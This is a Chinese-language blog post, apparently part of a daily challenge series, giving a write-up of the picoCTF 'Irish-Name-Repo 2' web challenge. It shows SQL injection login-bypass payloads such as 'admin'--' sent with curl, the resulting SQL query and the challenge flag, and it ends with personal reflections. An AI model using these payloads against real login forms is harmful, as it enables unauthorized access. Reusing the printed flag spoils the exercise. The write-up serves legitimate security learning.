[Day 27] Web 小迷茫

今天要解的题目和昨天有关联
是他进阶的2.0
没错,又是爱尔兰人

Irish-Name-Repo 2 ( 350 points)

There is a website running at https://jupiter.challenges.picoctf.org/problem/64649/ (link). Someone has bypassed the login before, and now it's being strengthened. Try to see if you can still login! or http://jupiter.challenges.picoctf.org:64649
Hints
The password is being filtered.

昨天有关於 SQli
今天也继续往这方面联想
link 点入後提供了一个登入页面

<form action="login.php" method="POST">
    <fieldset>
        <div class="form-group">
            <label for="username">Username:</label>
            <input type="text" id="username" name="username" class="form-control">
        </div>
        <div class="form-group">
            <label for="password">Password:</label>
            <div class="controls">
                <input type="password" id="password" name="password" class="form-control">
            </div>
        </div>
        <input type="hidden" name="debug" value="0">

        <div class="form-actions">
            <input type="submit" value="Login" class="btn btn-primary">
        </div>
    </fieldset>
</form>

Oh NO
使用昨天的方式没效

root@kali:/media/sf_CTFs/pico/Irish-Name-Repo_2# curl "https://2019shell1.picoctf.com/problem/64649/login.php" --data "username=admin&password='+or+1=1--" && echo
<h1>SQLi detected.</h1>

admin'or'1'='1 --
SQli detected

试试看调整 debug 参数
来检查 SQli
改改看把0改成1

root@kali:/media/sf_CTFs/pico/Irish-Name-Repo_2# curl 
<pre>username: admin'--
password: 1
SQL query: SELECT * FROM users WHERE name='admin'--' AND password='1'
</pre><h1>Logged in!</h1><p>Your flag is: picoCTF{m0R3_SQL_plz_015815e2}</p>

10/13
我的好朋朋提醒我,昨天这题 key point 没抓对
不好意思各位,我想挑战350分的题
解的有困难去看 write up
语意上有些误会
真对不起大家

这题必须要用 admin 的身分进去,
但是我没有 admin 的密码,
所以要把 SQL 查询密码的地方注解掉,
帐号输入admin' -- 就会拿到 flag

我昨天的错误在於强调 debug mode 0改成1
这段code昨天没删除
他是不需要的扣删掉
就喷flag ㄌ
"https://2019shell1.picoctf.com/problem/64649/login.php" --data "username=admin'--&password=1&debug=1" && echo
是错的喔!!!

为什麽我会想debug改成1试试呢?
debug 改成 1 会出现 debug 的模式,
可以让你 debug 知道你传的帐号密码会进去资料库的时候
SQL 查询语句长怎麽样

picoCTF{m0R3_SQL_plz_015815e2}

附上我参考的 write up
https://0xdiablos.github.io/Irish-Name-Repo/

今天莫名的很迷茫焦躁
情绪在全身流窜
明白快乐是生命中一闪而逝的烟火
你们也为了那点光而努力生活吗?
否则怎会有那句话
人生不如意十之八九
或许每个人都有阴影吧
如何面对自己的恶梦及缺陷
我也还学不会
我逃避了好多年
希望今年的我够勇敢
足以面对


<<:  [Day27] 建立 Mock Module / Function 的方式(ft. TypeScript)

>>:  每日挑战,从Javascript面试题目了解一些你可能忽略的概念 - Day27

很急 ANYDESK 8码

想请问一下各位大大 你们之前使用ANYDESK 客户端是出现8码吗? 因为以前都是9个数子,客户端出...

找LeetCode上简单的题目来撑过30天啦(DAY13)

题号:11 标题:Container With Most Water 难度:Medium Given...

自动化 End-End 测试 Nightwatch.js 之踩雷笔记:select option

相信 E2E 一定有做过遇到这种需要选择的部分,结构大致上会长这样 <select class...

Day 21. 透过实作设计一个登入页面,掌握 Figma 基本工具

今天来设计每个网页几乎都会有的登入页面吧!跟着 Rson 一起实作完,就能做出下面这张设计稿: 分二...

资料库介绍(Day10)

在上一篇内容中提到一个服务器需要以怎麽样的规格跟方式来跟用户沟通,来让他们找寻/新增他们需要的服务,...